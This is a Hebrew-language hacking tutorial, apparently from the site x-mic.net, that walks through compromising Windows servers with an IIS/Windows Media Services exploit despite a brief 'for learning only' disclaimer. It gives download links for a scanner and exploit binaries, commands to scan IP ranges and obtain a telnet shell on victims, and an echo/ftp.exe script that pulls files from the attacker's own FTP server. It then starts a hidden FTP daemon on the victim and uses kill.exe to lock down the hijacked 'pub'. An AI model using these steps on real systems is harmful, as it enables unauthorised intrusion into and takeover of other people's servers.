המדריך
לפריצת+סריקה iis media
=================
=====================================================
כל מה שכתוב פה ללמידה בלבד
וכול מי שמשתמש בו לפריצה הוא לעשית נזק כלשהו עובר על החוק
=====================================================
א:מצרכים FTP שתומך בפיקסוס
ב:את התוכנה SERV -U
ג:את האקספלויט של IIS MEDIA
ד:סורק של IIS MEDIA
ה:ואת הקובץ winmgnt
הערות
--------------------------------
דבר ראשון אני יוצאה מנקודת הנחה שאתם יודעים להשתמש בתוכנת SERV U
אם אתם לא יודעים תשחקו איתה קצת
זה אנגילת פשוטה להבנה אז אתם יכולים להסתדר בלי מדריך
ועובדה שאני יסתדרתי בלי מדריך לתוכנה הזאות
והערה אחרונה אם אני אומר פאב אני מתכון FTP (זה לא אותו דבר אבל למען הונחיות שלי בכתיבת המדריך אז זה אותו דבר)
--------------------------------
תורידו את התוכנה serv-U מפה:
http://www.serv-u.com/customer/record.asp?prod=su
ותתקינו את התוכנה ותפתחו חשבון ftp בעזרת התוכנה
וחשוב מאוד שהחשבון הזה יתמוך בפייקסוס מפאב לפאב
ועכשיו כנסו לFTP שפתחתם ותעלו לשמה
את הקבצים הבאים
ServUDaemon.ini
הקובץ שיך לתוכנה serv u והוא יופיע רק אחרי שתפתחו פאב על המחשב שלכם
ואם אתם לא מוצאים אותו תעשו חיפוש לקובץ הזה
ואחרי שעלתם את הקובץ ServUDaemon.ini
תעלו את הקובץ winmgnt.exe
הניתן להורדה מהקישור הבא:
http://www.x-mic.net/programs/WINMGNT.rar
טוב אחרי שפתחתם חשבון ftp ועלתם לשמה את הקבצים אז צריך לסרוק שרתים פגעים אנחנו נסרוק בעזרת התוכנה scan500
הקישור להורדה נמצא פה:
http://www.x-mic.net/programs/scan500.rar
אחרי שהורדתם אתם צריכים לסרוק טווח של מחשבים (מדריך למצאית טווחים יש בגיליון השני של Iha)
הסריקה פשוטה מאוד תשימו את הקובץ scan1000.exe בכונן c תחת תיקיה scan iis media
אם אין לכם את התיקיה הזאות אז תפתחו אותה
עכשיו כנסו לדוס התחל>הפעלה>cmd
אם יש לכם וינדוס באנגלית אז start>run>cmd
נכנסתם לדוס? יופי עכשיו תכתבו שמה
cd c:\scan iis media
ושמה תכתבו את הפקודה הזאות scan500 -meida ip1 ip2
ip1=הIP שממנו תתחיל הסריקה
ip2=הIP שבאו תעצור הסריקה
שבעצם בIP אתם כותבים את הטווח שמצאתם
עכשיו אם זה גמר לסרוק אז הוא יכתוב לכם משהו כזה
----------------------------
Please wait 253 Thread end.....
253 Host search complete. Find 4 hole!
----------------------------
עכשיו הסבר קצר על מה שהוא כותב לכם
אתם רואים שכתוב 253 זה אומר שהוא סרק 253 מחשבים (IP)
איפה שכתוב 4 זה אומר שהוא מצא 4 מחשבים אם החור של הIIS MEDIA
זה אומר שיש לנו ארבע תוצאות שצריך לבדוק אם הם פריצות
אם היה כתוב אפס זה אומר שאין תוצאות טובות
אחרי שסרקנו וזה כתב לנו שיש משהו פריץ אז כנסו לתיקיה ששמנו את SCAN500
למי שלא זוכר איפה שמנו אז שמנו את זה ב c:\scan iis media
ואחרי שנכנסו לתיקיה אז אמור להיות שמה מסמך טקסט שכתוב בו משהו כזה
------------------------
213.156.5.155 Windows Media Services Enabled!
213.164.248.117 Windows Media Services Enabled!
213.156.69.121 Windows Media Services Enabled!
------------------------
רק אם מספרים אחרים
כאילו IP אחר
עכשיו נעבור לפריצה עצמה
תורידו את האקספלויט של IIS MEDIA מפה:
https://www.angelfire.lycos.com/co4/bd/media.exe
ותשימו אותו בכונן c
עכשיו כנסו לדוס
התחל>הפעלה>cmd
start>run<cmd
ותכתבו שממה cd\
אחרי זה תכתבו
את הפקודה הבאה
-------------
media.exe ip 80
-------------
80=הפורט
ip=הIP שיצא בסריקה נגיד אם יצאה לנו בסריקה משהו כזה
213.156.5.155 Windows Media Services Enabled!
אז נכתוב
-------------
media.exe 213.156.5.155
-------------
אחרי שכתבתם את הקוד הזה תלחצו על ENTER
אם זה פותח לכם חלון של טלנט (telnet)
אז פרצתם למחשב
אם לא אז תעברו לתוצאה הבאה בסריקה ותעשו את הפועלה הקודמת שעשינו
עכשיו אחרי שזה פתח לנו חלון טלנט אנחנו יכולים לעשות מה שאנחנו רוצים במחשב שלו
אבל אנחנו נפתח לו היום ftp על המחשב
טוב אז נתחיל זוכרים את הפאב שפתחנו על המחשב של עצמנו? (אני מקווה שכן)
אז עכשיו נשתמש בו
אההההה יש לו עוד הערה אנחנו לא חייבים לפתוח פאב על עצמנו אנחנו יכולים פשוט להשתמש בכול פאב שתומך בפיקסוס
אבל בשביל הנוחות רצוי לפתוח על עצמנו
עכשיו תכתבו את הפקודות האלו אחת אחרי השניה בטלנט
-----------------------
echo open ip port >> c
echo user >> c
echo pass >> c
echo mget *.* >> c
echo bye >> c
ftp.exe -i -s:c
-----------------------
ip=הIP של ההפאב שפתחתם על המחשב שלכם
port=הפורט ששמתם לפאב שלכם
user=שם משתמש של הפאב שלכם
pass=הסיסמא ששמתם על הפאב שלכם
אני ממליץ לעשות אחרי הפקודות האלו את הפקודה dir ולראות אם באמת הוא העלה את הקבצים
ServUDaemon.ini וwinmgnt.exe
אם הוא לא עלה את הקבצים תעשו את הפקודות למעלה שוב
אחרי זה תכתבו את הפקודה
start winmgnt.exe
אם עשיתם את הכול נכון ולא היו בעיות אז אתם יכולים להיכנס עכשיו לפאב שעשיתם
עכשיו אתם שואלים אך אתם עושים הגנה
אז פשוט תורידו את הקובץ kill.exe מפה:
https://www.angelfire.lycos.com/co4/bd/kill.exe
ותעלו אותו לפאב שפרצתם
ואם אתם משתמשים בflashfxp
אז תלחצו ctrl+r
ותכתבו שמה את הקוד הבא:
--------------------
site exec kill.exe
--------------------
וזהו יש לכם פאב מוגן
אם יש לכם שאלות הצעות וסתם תגובות נתן לשלוח אותם לemail שלי
bdhack@hotmail.co.il
or
או לכתוב
הודעה בפורום
המדריך שיך לאתר www.x-mic.net